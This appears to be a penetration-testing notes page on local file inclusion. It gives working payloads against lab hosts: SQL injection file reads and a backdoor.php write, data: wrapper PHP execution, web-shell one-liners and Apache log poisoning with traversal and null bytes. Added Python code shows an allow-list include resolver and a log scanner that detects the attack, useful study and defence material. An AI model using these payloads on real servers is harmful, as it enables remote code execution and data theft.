# LFI

## Basic RCE Example:

{% tabs %}
{% tab title="LFI Read" %}
If you have SQLi or can modify templates, check whether you can read a system file. If that works you can try for RCE (in this case it is Windows with Apache; `load_file()` also requires the database user to hold the MySQL FILE privilege):

<mark style="color:green;"><http://192.168.11.35/comment.php?id=-1> union select all 1,2,3,4,load\_file('c:/windows/system32/drivers/etc/hosts'),6</mark>
{% endtab %}

{% tab title="LFI RCE" %}
Find a place to upload the *backdoor.php* file or write it with SQLi. Then include it through the LFI so the server runs it and you get RCE.

<mark style="color:green;"><http://10.11.1.35/comment.php?id=738> union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'</mark>
{% endtab %}
{% endtabs %}

![Backdoor RCE via LFI read](/files/-McqoroYVQKXRWf3oRpS)

## **PHP WRAPPERS:**

#### Example 1:

<mark style="color:green;"><http://10.11.0.22/menu.php?file=></mark><mark style="color:green;">**data:text/plain,hello world**</mark>

![](/files/-Mcqoveib5y_XjXQNcrA)

The menu page is vulnerable to LFI. If we submit a payload using a `data:` wrapper, the application should treat the text the same as a regular file and include it in the page, so any PHP inside it is executed (the `data:` wrapper is only honoured by `include` when `allow_url_include` is enabled in php.ini):

<mark style="color:green;"><http://10.11.0.22/menu.php?file=></mark><mark style="color:green;">**data:text/plain,\<?php echo shell\_exec("dir") ?>**</mark>

{% hint style="info" %}
Encodings are often combined with this method. Below are a couple of sources to get you started. <https://github.com/cyberheartmi9/PayloadsAllTheThings/blob/master/File%20Inclusion%20-%20Path%20Traversal/README.md>

<https://www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/>
{% endhint %}

## **EXAMPLE:**

Found this code on the site:

![](/files/-Mcqp-ooDOGGRxumNGp4)

`include`: used to load files (PHP files in this case) from the server's local filesystem and run them.

In this case we can submit something other than `en`, `fr`, etc. and make the server include other files. We test a common Windows file to make sure our traversal works.

![](/files/-Mcqp2izb400TT48Gq00)

A null byte `%00` is used to stop the code from appending the `.php` extension in the include statement: older PHP truncated the path at the null byte, so the appended extension was dropped. This only works on PHP versions before 5.3.4, which reject paths containing null bytes.
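The `data:` wrapper payload above and this traversal/null-byte example are both defeated by the same fix: validate the `file`/`LANG` value against an allow-list instead of concatenating it into `include`. The following is an added example (not code from the original page or from the site it describes) that models the page's unsafe pattern beside a hardened resolver, in Python so the two can be compared and tested offline; the allow-list contents, the base directory and the function names are assumptions.

```python
import os
from pathlib import Path
from typing import Optional
from urllib.parse import unquote

# Assumed allow-list of language codes the menu page legitimately serves.
ALLOWED_LANGS = {"en", "fr", "de"}

# Stream wrappers that must never reach include(); data: and php: are the
# ones the page uses, the others are common PHP wrappers worth blocking too.
FORBIDDEN_WRAPPERS = ("data:", "php:", "file:", "http:", "https:",
                      "ftp:", "phar:", "expect:", "zip:")


def vulnerable_include_path(base_dir: str, raw_value: str) -> str:
    """Models the page's unsafe pattern: include($LANG . '.php') with no
    validation. It only builds the string include() would receive; nothing is
    opened. Traversal segments and NUL bytes pass straight through."""
    return os.path.join(base_dir, unquote(raw_value) + ".php")


def safe_include_path(base_dir: str, raw_value: str) -> Optional[str]:
    """Hardened resolver: returns an absolute path under base_dir, or None
    when the value is anything other than an allow-listed language code."""
    value = unquote(raw_value)          # %00 -> NUL, %2e%2e -> .., etc.

    # 1. Reject NUL bytes outright; legacy PHP truncated the path at %00,
    #    which is exactly what the page's null-byte trick relied on.
    if "\x00" in value:
        return None
    # 2. Reject stream wrappers so data: and php: payloads never reach include().
    if value.lower().startswith(FORBIDDEN_WRAPPERS):
        return None
    # 3. Allow-list: only known language codes are acceptable.
    if value not in ALLOWED_LANGS:
        return None
    # 4. Defence in depth: resolve and confirm the file stays under base_dir.
    base = Path(base_dir).resolve()
    candidate = (base / f"{value}.php").resolve()
    if base not in candidate.parents:
        return None
    return str(candidate)


if __name__ == "__main__":
    base = "/var/www/html"   # assumed web root
    for probe in ("en",
                  "../../../../../../../xampp/apache/logs/access.log%00",
                  "data:text/plain,hello world"):
        print(repr(probe), "->", safe_include_path(base, probe))
```

The same logic in PHP is a `switch`/`in_array` allow-list on `$_GET['LANG']` combined with `allow_url_include=Off`; the traversal and null-byte checks then become redundant but cost nothing.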

### Log File Poison RCE:

One way to get RCE with LFI is by poisoning a log file with PHP and then including the log through the LFI so the PHP is executed. We can do this by making a bad request with nc that contains our code, then reading the log back through the vulnerable include.

![](/files/-Mcqp5qU7CzRpA0MHdxF)

{% hint style="info" %}
Try other PHP shells if this does not work. It may also need a `<pre>` tag to keep spacing, e.g. <mark style="color:green;">\<?php echo '\<pre>' . shell\_exec($\_GET\['cmd']) . '\</pre>';?></mark>
{% endhint %}

This causes our request to be logged at `c:\xampp\apache\logs\access.log`.

{% hint style="warning" %}
Match your log file type/path to the server you are attacking.
{% endhint %}

#### Running the RCE:

<mark style="color:green;"><http://10.11.1.35/addguestbook.php?cmd=ipconfig\\&LANG=../../../../../../../xampp/apache/logs/access.log%00></mark>

![Log file holds our rce output](/files/-Mcqp9hdO3isIzGXbg5g)

Commands execute with the privileges of the Apache process. From here a more persistent shell/backdoor can be established.
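From the defender's side, log poisoning leaves two traces in the same access log it abuses: a request line or User-Agent carrying a PHP open tag, followed by a request whose parameter traverses to the log file (often with a trailing `%00`). The following is an added example, not code from the original page or from the site it describes: a small Python scanner over Apache combined-format lines that flags both stages. The log lines are constructed for this example, and the field names and function name are assumptions.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Apache "combined" log format: ip ident user [ts] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# PHP open tags (<?php or <?=); matched after percent-decoding so %3C%3Fphp is caught too.
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)
# Traversal that ends up at an Apache log file, e.g. ../../xampp/apache/logs/access.log
LOG_TRAVERSAL_RE = re.compile(r"\.\./.*(access|error)\.log", re.IGNORECASE)

# Constructed sample lines (not from any real server); line 2 plants a tag in
# the request path, line 3 includes the log via LFI, line 4 plants a tag in the UA.
SAMPLE_ACCESS_LOG = [
    '10.11.0.5 - - [12/Jun/2021:10:01:02 +0000] "GET /menu.php?file=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.11.0.99 - - [12/Jun/2021:10:02:15 +0000] "GET /<?php echo shell_exec($_GET[\'cmd\']); ?> HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '10.11.0.99 - - [12/Jun/2021:10:02:40 +0000] "GET /addguestbook.php?cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.11.0.7 - - [12/Jun/2021:10:03:01 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "<?php echo shell_exec($_GET[\'cmd\']); ?>"',
    '10.11.0.5 - - [12/Jun/2021:10:04:00 +0000] "GET /menu.php?file=fr HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
]


def scan_access_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, reason) findings for poisoning and inclusion attempts."""
    findings: List[Tuple[int, str]] = []
    for n, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            findings.append((n, "unparseable line"))
            continue
        ip = m.group("ip")
        # Decode percent-encoding so encoded tags and %00 look like their raw forms.
        fields = {k: unquote(m.group(k)) for k in ("request", "referer", "ua")}

        # Stage 1: PHP written into any logged field.
        for name, value in fields.items():
            if PHP_TAG_RE.search(value):
                findings.append((n, f"php tag in {name} from {ip}"))

        # Stage 2: the log itself requested through a traversal, with or without a NUL.
        request = fields["request"]
        if LOG_TRAVERSAL_RE.search(request):
            findings.append((n, f"log file referenced via traversal from {ip}"))
        if "\x00" in request:
            findings.append((n, f"null byte in request from {ip}"))
    return findings


if __name__ == "__main__":
    for line_no, reason in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {line_no}: {reason}")
```

Running this over a real log only needs `scan_access_log(open(path).read().splitlines())`; a tag in a logged field is almost never legitimate traffic, so the first-stage hits are the high-confidence alerts, and the second-stage hits tell you whether the include was ever attempted.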

